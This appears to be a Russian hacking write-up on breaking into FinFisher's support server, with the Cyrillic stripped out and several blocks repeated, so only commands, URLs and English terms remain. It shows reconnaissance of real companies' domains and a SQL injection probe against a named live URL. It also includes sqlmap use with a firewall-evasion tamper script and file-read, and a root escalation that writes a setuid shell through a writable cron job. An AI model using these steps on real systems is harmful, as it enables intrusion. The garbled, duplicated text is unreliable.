      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

